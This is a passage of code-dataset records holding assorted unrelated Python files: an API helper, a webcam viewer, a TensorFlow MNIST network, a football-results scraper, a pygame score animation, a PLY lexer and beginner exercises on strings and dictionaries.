_send_get_request(self):\n r = requests.get(self.cmd_url, data=json.dumps(self.cmd_params), headers=self.cmd_header)\n rsp = json.loads(r.text, encoding='utf-8')\n if rsp['RetCode'] != 0:\n print(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n uai_logger.error(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n return False, rsp\n else:\n print(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n uai_logger.info(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n return True, rsp\n\n","sub_path":"uai-ocr-sdk/api/base_datastream_api.py","file_name":"base_datastream_api.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"272681632","text":"import cv2\nimport numpy as np\n\nCam = cv2.VideoCapture(0)\n\nif None == Cam:\n\tprint(\"No cam\")\n\texit()\n\nwhile(True):\n\tRet, Frame = Cam.read()\n\tcv2.imshow(\"Frame\", cv2.flip(Frame, 1))\n\t\n\tKey = cv2.waitKey(30) & 0xff \n\tif Key == ord('q'):\n\t\tbreak\n\nCam.release()\ncv2.destroyAllWindows()\n","sub_path":"HCI2017_HW/HW5/HCIByCV.py","file_name":"HCIByCV.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124826034","text":"#!/usr/bin/env python3\n\n#python3 p_dist_.py gene-peak-file gene-p-val-file 
outFile\n\n\nimport sys\nfrom bisect import insort\nfrom scipy.stats import ranksums\n\n\n\n\npeaksFile = open(sys.argv[1], \"r\")\nfgGenes = set()\nfor line in peaksFile:\n tokens = line.strip().split()\n peak = tokens[3]\n gene = tokens[7]\n fgGenes.add(gene)\npeaksFile.close()\n\nfgPvals = []\nbgPvals = []\npValFile = open(sys.argv[2], \"r\")\npValFile.readline()\nfor line in pValFile:\n tokens = line.strip().split(\"\\t\")\n gene = tokens[0].replace(\"\\\"\", \"\")\n if tokens[3] == \"NA\":\n continue\n p = float(tokens[3])\n if gene in fgGenes:\n insort(fgPvals, p)\n else:\n insort(bgPvals, p)\npValFile.close()\n\nprint(len(fgPvals), len(bgPvals))\n\nprint(ranksums(fgPvals, bgPvals, \"less\"))\n\noutFile = open(sys.argv[3], \"w\")\noutFile.write(\"pval,fg\\n\")\nfor pval in fgPvals:\n outFile.write(str(pval) + \",T\\n\")\nfor pval in bgPvals:\n outFile.write(str(pval) + \",F\\n\")\noutFile.close()\n\n","sub_path":"evaluationScriptsEnhancerPhenotypeAssociations/p_dist_collect_gene.py","file_name":"p_dist_collect_gene.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"279555741","text":"'''\ntest_word_bag_3 with decreased memory overload\n'''\nimport sys\n\nfrom pathlib import Path\nfrom datetime import datetime\nname = Path(__file__).stem\n\nargs_list = [\n '--train', 'train_video_dataset_1_rgb_fast', 'transform_train_1', 'val2vl', 'video_random_2',\n '--test', 'test_video_dataset_1_rgb_fast', 'transform_test_1', 'val2vl', 'video_uniform_2',\n '--model', 'resnet18_word_bag',\n '--optimizer', 'sgd_1',\n '--scheduler', 'scheduler_4',\n '--num-epoch', \"15\",\n '--tensorboard-comment', name,\n '--checkpoint-name', f'{name}_{datetime.now()}.pth',\n]\n\nprint(\"sys.argv before\", sys.argv)\nsys.argv = [sys.argv[0]] + args_list\nprint(\"sys.argv after\", sys.argv)\n\nimport video_yyz.train\n\n'''\nnew\n\nTest: Total time: 0:06:49\n * Test Clip Acc@1 85.587\n100%|███████████████████████████████████████████████████████████████████████████████████| 15/15 [5:54:38<00:00, 1418.59s/it]\nTraining time 5:54:38\n\nnew (reshuffled) \nExpect low score to prove it's possible to prevent overfitting\n\nTest: Total time: 0:09:13\n * Test Clip Acc@1 48.656\n100%|███████████████████████████████████████████████████████████████████████████████████| 15/15 [5:53:07<00:00, 1412.50s/it]\nTraining time 5:53:07\n'''","sub_path":"video_yyz/exps/test_word_bag_6.py","file_name":"test_word_bag_6.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"5973045","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport pandas as pd\nimport time\n\ndiv = 'sw1'\n\nurl = 'https://footystats.org/norway/first-division/fixtures#2012'#'https://footystats.org/sweden/division-1/fixtures'\n\npage = requests.get(url, headers={\"User-Agent\": \"Requests\"})\n\nsoup = BeautifulSoup(page.text, 'html.parser')\n\nmatch_tables = soup.findAll(class_=\"matches-table inactive-matches\")\n\nmatches_data = []\n\nfor match in match_tables:\n\n for completed_match in match.findAll(class_=\"match complete\"):\n\n if completed_match is not None:\n date = datetime.fromtimestamp(int(completed_match.find(class_=\"date convert-months\")['data-time']))\n date = date.strftime('%Y-%m-%d')\n score = completed_match.find(class_=\"bold ft-score\").text.split(\" - \")\n home_goals = score[0]\n away_goals = score[1]\n\n home_team = 
completed_match.find(class_=\"team-home\").text\n            away_team = completed_match.find(class_=\"team-away\").text\n\n            matches_data.append([div,date,home_team,away_team,home_goals,away_goals])\n            print(f'{date} {home_team} {home_goals} - {away_goals} {away_team}')\n\n# matches_df = pd.DataFrame(matches_data,columns=['Div','Date','HomeTeam','AwayTeam','FTHG','FTAG'])\n#\n# print(matches_df)\n","sub_path":"obscure_leagues.py","file_name":"obscure_leagues.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"332183501","text":"from modules.server import MyHTTPServer\nfrom modules import log_util as lu\nimport sys, time\n\n\nif __name__ == \"__main__\":\n    lu.init_log_config('httpd', is_write_log_file=True, log_path=\"./log\")\n    daemon = MyHTTPServer()\n    if len(sys.argv) == 2:\n        lu.logger.info('http.main():: {} {}'.format(sys.argv[0], sys.argv[1]))\n\n        if 'start' == sys.argv[1]:\n            daemon.start()\n        elif 'stop' == sys.argv[1]:\n            daemon.stop()\n        elif 'restart' == sys.argv[1]:\n            daemon.restart()\n        elif 'status' == sys.argv[1]:\n            daemon.status()\n        else:\n            print(\"Unknown command\")\n            sys.exit(2)\n        sys.exit(0)\n    else:\n        lu.logger.warning('show cmd daemon usage')\n        lu.logger.warning(\"Usage: {} start|stop|restart|status\".format(sys.argv[0]))\n        sys.exit(2)\n\n","sub_path":"httpd_daemon.py","file_name":"httpd_daemon.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"180918177","text":"import tensorflow as tf\nimport os\nimport time\nfrom tensorflow.examples.tutorials.mnist import input_data\nstartTime = time.time()\ndef elapsedTime():\n    # use a local name that does not shadow the `time` module\n    elapsed = time.time() - startTime\n    print(str(int(elapsed/3600))+\"hrs\")\n    print(str(int(elapsed/60%60))+\"min\")\n    print(str(int(elapsed%60))+\"sec\")\nprint(\"\\\t+-----Welcome to the MNIST Neural Network-----+\\\n\\\n\")\nnetworkName = \"1HL-Conv\"\nmnist = input_data.read_data_sets(\"MNIST_data\", one_hot=True)\nprint(\"\\\t>> DATA IMPORT COMPLETE <<\\\n\")\n\nsess = tf.InteractiveSession()\n\n#multi-run handling\nlogs_path = \"\"\nfor i in range(1000):\n    deflogs_path = \"/tmp/mnist/\" + (\"{1}: run{0}\".format(i,networkName))\n    if os.path.isdir(deflogs_path) != True:\n        logs_path = deflogs_path\n        break\n\nwith tf.name_scope(\"inputs\"):\n    inp = tf.placeholder(tf.float32, shape=[None,784])\n    output_ = tf.placeholder(tf.float32, shape=[None,10])\n\ndef conv2d(x, W):\n    \"\"\"conv2d returns a 2d convolution layer with full stride.\"\"\"\n    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n    \"\"\"max_pool_2x2 downsamples a feature map by 2X.\"\"\"\n    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n                          strides=[1, 2, 2, 1], padding='SAME')\n\n\ndef weight_variable(shape):\n    \"\"\"weight_variable generates a weight variable of a given shape.\"\"\"\n    initial = tf.truncated_normal(shape, stddev=0.1)\n    return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n    \"\"\"bias_variable generates a bias variable of a given shape.\"\"\"\n    initial = tf.constant(0.1, shape=shape)\n    return tf.Variable(initial)\n\n\n\nwith tf.name_scope('reshape'):\n    inp_image = tf.reshape(inp, [-1, 28, 28, 1])\n\n# First convolutional layer - maps one grayscale image to 32 feature maps.\nwith tf.name_scope('conv1'):\n    W_conv1 = weight_variable([5, 5, 1, 32])\n    b_conv1 = bias_variable([32])\n    h_conv1 = tf.nn.relu(conv2d(inp_image, W_conv1) + b_conv1)\n\n# Pooling layer - downsamples by 2X.\nwith 
tf.name_scope('pool1'):\n h_pool1 = max_pool_2x2(h_conv1)\n\n# Second convolutional layer -- maps 32 feature maps to 64.\nwith tf.name_scope('conv2'):\n W_conv2 = weight_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\n# Second pooling layer.\nwith tf.name_scope('pool2'):\n h_pool2 = max_pool_2x2(h_conv2)\n\n# Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image\n# is down to 7x7x64 feature maps -- maps this to 1024 features.\nwith tf.name_scope('fc1'):\n W_fc1 = weight_variable([7 * 7 * 64, 1024])\n b_fc1 = bias_variable([1024])\n\n h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n# Dropout - controls the complexity of the model, prevents co-adaptation of\n# features.\nwith tf.name_scope('dropout'):\n keep_prob = tf.placeholder(tf.float32)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n# Map the 1024 features to 10 classes, one for each digit\nwith tf.name_scope('fc2'):\n W_fc2 = weight_variable([1024, 10])\n b_fc2 = bias_variable([10])\n\noutput = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\n\n\nwith tf.name_scope(\"costFunction\"):\n costFunc = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels = output_, logits = output ))\nwith tf.name_scope('train'):\n train_step = tf.train.AdamOptimizer(0.001).minimize(costFunc)\nsess.run(tf.global_variables_initializer())\n\n#Acccuracy management\nwith tf.name_scope('accuracyFunction'):\n with tf.name_scope('correct_prediction'):\n correct_prediction = tf.equal(tf.argmax(output,1), tf.argmax(output_,1))\n with tf.name_scope('accuracy'):\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n#Tensorboard logger\nwriter = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph())\ntf.summary.scalar(\"cost\", costFunc)\ntf.summary.scalar(\"accuracy\", accuracy)\nmerged = tf.summary.merge_all()\n\n#training loop\nfor t in range(1,1000):\n batch = mnist.train.next_batch(100)\n train_step.run(feed_dict={inp: batch[0], output_: batch[1], keep_prob: 0.5})\n writer.add_summary(merged.eval(feed_dict={inp: batch[0], output_: batch[1], keep_prob: 1.0}),t)\n if t % 100 == 0:\n print(\"\\n\\nBatch {} completed\".format(t))\nprint(\"\\n\\t+-----Done training-----+\\n\\n\")\n\n\npercent = accuracy.eval(feed_dict={inp: mnist.test.images, output_: mnist.test.labels, keep_prob: 1.0})\n\nprint(\"Accuracy: {}%\".format(percent*100))","sub_path":"2-convolution-mnist.py","file_name":"2-convolution-mnist.py","file_ext":"py","file_size_in_byte":4408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"61712460","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport argparse\nimport scipy.stats\nimport itertools\n\nparser = argparse.ArgumentParser(description='Computes a dissimilarity matrix.')\nparser.add_argument('otu_table_fn', metavar='OTU_TABLE_FN', help='input OTU table filename')\nparser.add_argument('out_fn', metavar='MATRIX_FN', help='dissimilarity matrix filename')\nparser.add_argument('--method', metavar='METHOD', help='dissimilarity function (options: euclidean [default], correlation)', default='euclidean')\nargs = parser.parse_args()\n\ndissimilarity_functions = { \\\n 'euclidean': lambda x, y: np.linalg.norm(x - y), \\\n 'correlation': lambda x, y: 1.0 - np.corrcoef(x, y)[0, 1], \\\n 'rootcorrelation': lambda x, y: np.sqrt(1.0 - np.corrcoef(x, y)[0, 1]), \\\n 'spearman': lambda x, y: 1.0 - scipy.stats.spearmanr(x, 
y)[0]\n}\n\npseudocounts = 0\ntable = np.genfromtxt(args.otu_table_fn, dtype=float)\ntable += pseudocounts\n\n# sanity check: each column should sum to 1 if the table holds relative abundances\nif abs(np.sum(table[:, 0]) - 1.0) > 1e-10:\n    inp = input(\"It looks like this table is not in relative abundances. Continue? [y/N]\")\n    if inp.lower() != \"y\":\n        raise RuntimeError(\"Table is not relative abundances\")\n\n# normalize rows\nnormed_table = table / table.sum(axis=1)[:, np.newaxis]\nassert(abs(np.sum(normed_table[0, :]) - 1.0) < 1e-10)\n\nn_otus = table.shape[0]\ndists = np.zeros((n_otus, n_otus))\n\nfor i in range(n_otus):\n    for j in range(i, n_otus):\n        otui = normed_table[i, :]\n        otuj = normed_table[j, :]\n\n        D = dissimilarity_functions[args.method](otui, otuj)\n\n        dists[i, j] = D\n        dists[j, i] = D\n\nnp.savetxt(args.out_fn, dists, delimiter='\\\t')\n","sub_path":"get_dissimilarity_matrix.py","file_name":"get_dissimilarity_matrix.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"106695845","text":"# dictionary = 'key' : 'value' pairs\n\nemployee = {\n# key : value\n    'nama' : 'Andy',\n    'usia' : 20,\n    'married' : True,\n    'jabatan' : 'IT engineer',\n    'kendaraan' : ['mobil','motor'],\n    'address' : {\n        'street' : 'jalan mawar',\n        'rt' : 5,\n        'rw' : 2,\n        'zipcode' : 41181,\n        'geo': {\n            'lat' : 12345.2344,\n            'long' : 1233245.123234\n        }\n    }\n}\nprint(employee)\nprint(\"the value for key 'nama' is:\", employee['nama'])\nprint(\"the value for key 'kendaraan' is: \",employee['kendaraan'])\nprint(\"the value for key 'kendaraan' at the first index is: \",employee['kendaraan'][0])\nprint(\"the value for key 'address' is: \",employee['address'] )\nprint(\"the value for key 'address' -> 'street' is: \",employee['address']['street'] )\n\n\n# print(list(employee.keys()))\n# print(list(employee.values()))\n\n# using .get\nprint(employee.get('nama'))\nprint(employee.get('gaji')) # 'gaji' is not in the dict, so the result is None\nprint(employee.get('gaji','key not found')) # 'gaji' is not in the dict, so the fallback 'key not found' is returned\n\n# assign a new value to a brand-new key\nemployee['gaji'] = 2000000\nprint(employee)\n\n# update the value of a key that already exists\nemployee['gaji'] = 3000000\nprint(employee)\nemployee['kendaraan'].append ('scooter') # mutate the list value directly with .append (no reassignment of employee needed)\n\n# .update adds or updates keys and values\nemployee.update ({'NIK': 92131231, 'BPJS' :10000002121})\nprint(employee)\n\n# .items\nprint(list(employee.items())) # turns every entry into a (key, value) pair\nprint(list(employee['address'].items()))\nprint(employee['address']['geo'].items())\n\n# check whether a value exists in the dictionary\nprint('is the value 3,000,000 present?: ', 3000000 in employee.values())\n\n# EXAMPLE: find the smallest or largest value in a dictionary\nnilai_ujian = {\n    'fisika' : 85,\n    'matematika' : 65,\n    'sejarah' : 70\n}\n\nprint('the subject with the lowest score is: ',min(nilai_ujian, key=nilai_ujian.get))\nprint('the subject with the highest score is: ', max(nilai_ujian, key=(nilai_ujian.get)))\n\n# rename a key\nemployee['alamat'] = employee.pop('address') # renaming a dict key requires .pop on the dict itself (there is no in-place rename)\nprint(employee)\n\n# merge two dictionaries\ndic1 = {'ten' : 10, 'twenty' : 20,'thirty' : 30}\ndic2 = {'forty' : 40, 'fifty' : 50, 'sixty' : 60}\n\n# merge method 1: .copy + .update\ndic3 = dic1.copy()\ndic3.update(dic2)\nprint(dic3)\n\n# merge method 2: dict unpacking\ndic1_dic2 = {**dic1 , **dic2}\nprint(dic1_dic2)\n\n
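# On Python 3.9+ the same merge can also be written with the dict union\n# operator (this example assumes a 3.9+ interpreter):\ndic4 = dic1 | dic2\nprint(dic4)\n\n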
# zip pairs up iterables (list, tuple, set) element by element by index; here it builds dictionaries from two lists\nkey = ['ten', 'twenty', 'thirty']\nvalue = [10,20,30]\n\nsample_dic = dict(zip(key, value))\nsample_dic_reversed = dict(zip(value,key))\nprint(sample_dic)\nprint(sample_dic_reversed)\n\nsample_list = list(zip(key, value))\nprint('this is a sample list' , sample_list)\n\nsample_tuple = tuple(zip(key, value))\nprint(sample_tuple)\n\nsample_dic_test = {*key , *value} # note: unpacking into braces like this builds a set, not a dict\nprint(sample_dic_test)\n\n# initialize a dictionary with default values\nkaryawan = ['doni', 'aryo','brian']\ndefault = {'designation' : 'application developer', 'salary' : 5000000}\n\nres_dic = dict.fromkeys(karyawan, default)\nprint(res_dic)\n\nprint(res_dic['doni'])\n\n#quiz 1\n# hari = input('enter a day: ').lower()\n# days = {\n#     'senin' : 'monday',\n#     'selasa' : 'tuesday',\n#     'rabu' : 'wednesday',\n#     'kamis' : 'thursday',\n#     'jumat' : 'friday',\n#     'sabtu' : 'saturday',\n#     'minggu' : 'sunday'\n# }\n# print('the English for',hari.lower(),'is: ',days[hari].lower())\n\n#quiz 2\n\n# hari = input('enter a day (INA/ENG): ')\n# days = {\n#     'senin' : 'monday',\n#     'selasa' : 'tuesday',\n#     'rabu' : 'wednesday',\n#     'kamis' : 'thursday',\n#     'jumat' : 'friday',\n#     'sabtu' : 'saturday',\n#     'minggu' : 'sunday'\n# }\n# INA = list(days.keys())\n# ENG = list(days.values())\n# # print(INA)\n# # print(ENG)\n# if hari in INA:\n#     print(f'the English for {hari} is: {days[hari]}')\n# elif hari in ENG:\n#     print(f'the Indonesian for {hari} is: {INA[ENG.index(hari)]}')\n# else:\n#     print('adadsdf')","sub_path":"4.dictionary.py","file_name":"4.dictionary.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"186355291","text":"import pygame\nimport math\nimport random\n\npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((640, 480))\n\nclass ScoreBoardSprite (pygame.sprite.Sprite):\n    def __init__(self):\n        pygame.sprite.Sprite.__init__(self)\n        self.alpha = 255\n        self.x = 0\n        self.y = 0\n        self.main_surface = pygame.Surface((220, 50))\n        self.surface = self.main_surface\n        self.font = pygame.font.SysFont(\"None\", 50)\n        self.score_value = 0\n        self.score = self.font.render(\"Score: \" + str(self.score_value), 1, (200, 10, 10))\n        self.surface.blit(self.score, (self.x, self.y))\n        self.image = self.surface\n        self.rect = self.image.get_rect()\n\n    def update(self):\n        self.score = self.font.render(\"Score: \" + str(self.score_value), 1, (200, 10, 10))\n        self.surface = self.main_surface\n        self.surface.blit(pygame.Surface((220, 50)), (0, 0))\n        self.surface.blit(self.score, (self.x, self.y))\n        self.image = self.surface\n\n    def addPoints(self, value):\n        self.score_value = self.score_value + value\n\nclass ScoreSprite (pygame.sprite.Sprite):\n    def __init__(self):\n        pygame.sprite.Sprite.__init__(self)\n        self.sound = pygame.mixer.Sound('points2.wav')\n        self.alpha = 255\n        self.x = 320 + random.randint(-25, 25)\n        self.y = 240 + random.randint(-25, 25)\n        self.surface = pygame.Surface((640, 480))\n        self.font = pygame.font.SysFont(\"None\", 50)\n        self.score_value = random.randint(10, 175)\n        self.score_value = int(5 * round(float(self.score_value)/5))\n\n        self.num = random.randint(1, 10)\n        self.score = self.font.render(\"+\" + str(self.score_value), 1, (200, 10, 10))\n        self.surface.blit(self.score, ((self.x -10), (self.y - 10)))\n        self.image = self.surface\n        self.rect = self.image.get_rect()\n        self.alpha_mod = 
1\n self.sound.play()\n\n def update(self):\n if self.alpha > 0:\n self.rect.centery -= 3\n self.alpha -= self.alpha_mod\n elif self.alpha <= 0:\n pygame.sprite.Sprite.kill(self)\n\n self.surface.set_alpha(self.alpha)\n self.image = self.surface\n\nbackground = pygame.Surface(screen.get_size())\nbackground.convert()\n\nbackground.fill((0, 0, 0))\n\nclock = pygame.time.Clock()\nkeep_going = True\nscore = ScoreSprite()\nscore_board = ScoreBoardSprite()\nscore_board.addPoints(score.score_value)\n\nwhile keep_going:\n clock.tick(30)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n keep_going = False\n\n screen.blit(background, (0, 0))\n score_group = pygame.sprite.OrderedUpdates(score)\n score_board_group = pygame.sprite.OrderedUpdates(score_board)\n score_group.update()\n score_board_group.update()\n score_group.draw(screen)\n score_board_group.draw(screen)\n pygame.display.flip()\n\n if score.alpha <= 0:\n alpha_mod = score.alpha_mod\n score = ScoreSprite()\n score_board.addPoints(score.score_value)\n score.alpha_mod = alpha_mod + 1\n if score.alpha_mod > 255:\n score.alpha_mod = random.randint(1, 20)\n","sub_path":"viewport.py","file_name":"viewport.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"594995586","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTests of the objective package\n\"\"\"\n\n# needed for python 3 compatibility\nfrom __future__ import division\nimport os.path\nimport neo\nimport numpy\nimport quantities as pq\n\n# Sometimes it is convenient to run it outside of the unit-testing framework\n# in which case the ng module is not imported\nif __name__ == '__main__':\n from neurotune.utilities import DummyTestCase as TestCase # @UnusedImport\nelse:\n try:\n from unittest2 import TestCase\n except ImportError:\n from unittest import TestCase\nfrom neurotune.objective.spike import (SpikeFrequencyObjective,\n SpikeTimesObjective,\n MinCurrentToSpikeObjective,\n SpikeAmplitudeObjective)\nfrom neurotune.analysis import AnalysedRecordings\ntry:\n from matplotlib import pyplot as plt\nexcept:\n plt = None\n\n\n# Load testing traces into analysed recordings\ndata_dir = os.path.join(os.path.dirname(__file__), '..', '..', 'data',\n 'traces')\nsoma_seg = neo.PickleIO(os.path.join(data_dir, 'purkinje_soma.pkl')).read()\ndend_seg = neo.PickleIO(os.path.join(data_dir, 'purkinje_dendrite.pkl')).read()\nsoma_analysis = AnalysedRecordings(soma_seg)\ndend_analysis = AnalysedRecordings(dend_seg)\nreference = soma_analysis.get_analysed_signal()\navg_reference_amp = numpy.average(reference.spike_amplitudes())\navg_reference_freq = numpy.average(reference.spike_frequency())\n\n\nclass TestObjectiveBase(TestCase):\n\n def test_fitness(self):\n fitnesses = []\n for objective in self.objectives:\n fitnesses.append(objective.fitness(soma_analysis))\n # self.assertEqual(fitnesses, self.target_fitness)\n return fitnesses\n\n\nclass TestSpikeFrequencyObjective(TestObjectiveBase):\n\n target_fitnesses = 0.0\n \n references = numpy.arange(20, 70, 5) * pq.Hz\n\n def setUp(self):\n self.objectives = [SpikeFrequencyObjective(frequency,\n time_start=reference.t_start,\n time_stop=reference.t_stop)\n for frequency in self.references]\n\n\nclass TestSpikeTimesObjective(TestObjectiveBase):\n\n target_fitness = 0.0\n\n def setUp(self):\n self.objective = SpikeTimesObjective(reference.spikes(),\n time_start=reference.t_start,\n time_stop=reference.t_stop)\n\n\nclass 
TestMinCurrentToSpikeObjective(TestObjectiveBase):\n\n target_fitness = 0.0\n\n def setUp(self):\n self.objective = MinCurrentToSpikeObjective(time_start=reference.t_start,\n time_stop=reference.t_stop)\n\n\nclass TestSpikeAmplitudeObjective(TestObjectiveBase):\n\n target_fitness = 1.0\n\n references = numpy.arange(-20, 30, 5) * pq.mV\n\n def setUp(self):\n self.objectives = [SpikeAmplitudeObjective(amplitude,\n time_start=reference.t_start,\n time_stop=reference.t_stop)\n for amplitude in self.references]\n\"\"\"\nif __name__ == '__main__':\n test = TestSpikeAmplitudeObjective()\n test.setUp()\n fitnesses = test.test_fitness()\n plt.plot(test.references, fitnesses)\n plt.xlabel('Target amplitude (mV)')\n plt.ylabel('Fitness')\n plt.title(\"Objective function (avg. amp.={})\"\n .format(avg_reference_amp))\n plt.show()\n\"\"\"\n\nif __name__ == '__main__':\n test = TestSpikeFrequencyObjective()\n test.setUp()\n fitnesses = test.test_fitness()\n plt.plot(test.references, fitnesses)\n plt.xlabel('Target frequecy (Hz)')\n plt.ylabel('Fitness')\n plt.title(\"Objective function (avg. freq.={})\"\n .format(avg_reference_freq))\n plt.show()","sub_path":"test/unittest/objective/test_spike.py","file_name":"test_spike.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"538950094","text":"import ply.lex as lex\n\nreserved = {\n # Value : token\n '__DATA__': '__DATA__',\n '__END__': '__END__',\n '__FILE__': '__FILE__',\n '__LINE__': '__LINE__',\n '__PACKAGE__': '__PACKAGE__',\n 'if': 'IF',\n 'else': 'ELSE',\n 'elsif': 'ELSIF',\n 'for': 'FOR',\n 'foreach': 'FOREACH',\n 'while': 'WHILE',\n 'continue': 'CONTINUE',\n 'CORE': 'CORE',\n 'do': 'DO',\n 'exp': 'EXP',\n 'cmp': 'CMP',\n 'package': 'PACKAGE',\n 'q': 'Q',\n 'qq': 'QQ',\n 'qr': 'QR',\n 'qw': 'QW',\n 'qx': 'QX',\n 'no': 'NO',\n 's': 'S',\n 'sub': 'SUB',\n 'tr': 'TR',\n 'unless': 'UNLESS',\n 'until': 'UNTIL',\n 'lt': 'SLT',\n 'gt': 'SGT',\n 'le': 'SLE',\n 'ge': 'SGE',\n 'eq': 'SEQ',\n 'ne': 'SNE',\n\n}\n\nliterals = ['+', '-', '*', '/', '%', '|', '&', '^', '=', '(', ')', '[', ']', '{', '}', ',', '.', ';', ':', '\\\"']\n\ntokens = [\n 'ID_SC','ID_LI','ID', 'NUMBER',\n # Operators (<<, >>, ||, &&, !, <, <=, >, >=, ==, !=)\n 'LSHIFT', 'RSHIFT',\n 'LOR', 'LAND', 'LNOT',\n 'LT', 'LE', 'GT', 'GE', 'EQ', 'NE',\n\n # Assignment (=, *=, /=, %=, +=, -=, <<=, >>=, &=, ^=, |=)\n 'EQUALS', 'TIMESEQUAL', 'DIVEQUAL', 'MODEQUAL', 'PLUSEQUAL', 'MINUSEQUAL',\n 'LSHIFTEQUAL', 'RSHIFTEQUAL', 'ANDEQUAL', 'XOREQUAL', 'OREQUAL',\n\n # Increment/decrement (++,--)\n 'INCREMENT', 'DECREMENT',\n\n # Ternary operator (?)\n 'TERNARY',\n\n # Reserved words\n # TODO: move for reserved object\n # 'IT', 'M', 'Y'\n\n ] + list(reserved.values())\n\n# Operators\nt_LSHIFT = r'<<'\nt_RSHIFT = r'>>'\nt_LOR = r'\\|\\|'\nt_LAND = r'&&'\nt_LNOT = r'!'\nt_LT = r'<'\nt_GT = r'>'\nt_LE = r'<='\nt_GE = r'>='\nt_EQ = r'=='\nt_NE = r'!='\n\n# Assignment operators\nt_TIMESEQUAL = r'\\*='\nt_DIVEQUAL = r'/='\nt_MODEQUAL = r'%='\nt_PLUSEQUAL = r'\\+='\nt_MINUSEQUAL = r'-='\nt_LSHIFTEQUAL = r'<<='\nt_RSHIFTEQUAL = r'>>='\nt_ANDEQUAL = r'&='\nt_OREQUAL = r'\\|='\nt_XOREQUAL = r'\\^='\n\n\n# Identifiers\ndef t_ID_SC(t):\n r'\\$[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value, 'ID_SC') # Check for reserved words\n return t\n\ndef t_ID_LI(t):\n r'@[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value, 'ID_LI') # Check for reserved words\n return t\n\ndef t_ID(t):\n r'[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = 
reserved.get(t.value, 'ID') # Check for reserved words\n return t\n\n\n\ndef t_NUMBER(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n\n# Define a rule so we can track line numbers\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\n\n# A string containing ignored characters (spaces and tabs)\nt_ignore = ' \\t'\n\n\n# Error handling rule\ndef t_error(t):\n print(\"Illegal character '%s'\" % t.value[0])\n t.lexer.skip(1)\n\n\n# Build the lexer\nlexer = lex.lex()\n\n# Test it out\ndata = '''\n$_a\n@_b\nab\n'''\n\n# Give the lexer some input\nlexer.input(data)\n\nwhile True:\n tok = lexer.token()\n if not tok:\n break\n print(tok.type, tok.value, tok.lineno, tok.lexpos)\n\n# for tok in lexer:\n# print(tok.type, tok.value, tok.lineno, tok.lexpos)\n","sub_path":"application/src/Lexicon/lexico.py","file_name":"lexico.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"574229057","text":"\n#Question 1\n\nauthor = \"Camus\" \nprint(author[0:5])\n\n\n#Question 2\n\nresponse1 = input(\"What did you write:\") \nresponse2 = input(\"Where did you send it:\")\n\nx = \"Yesterday I wrote a {}. I sent it to {}!\".format(response1,response2)\n\nprint(x) \n\n#Question 3\n\ny = \"aldous\".capitalize()\nz = \"Huxley was born in 1894.\"\nx = y + \" \" + z\n\nprint(x)\n\n#Question 4\n\nt = [\"Where now? Who now? When now?\"]\nt[0:2]\n\nprint(t)\n\n#Question 5\n\na = [\"The\", \"fox\", \"who\", \"jumped\", \"over\", \"the\",\"fence.\"]\nb = \" \".join(a)\n\nprint(b)\n\n#Question 6\n\nc = \"A screaming came across the sky.\"\nc = 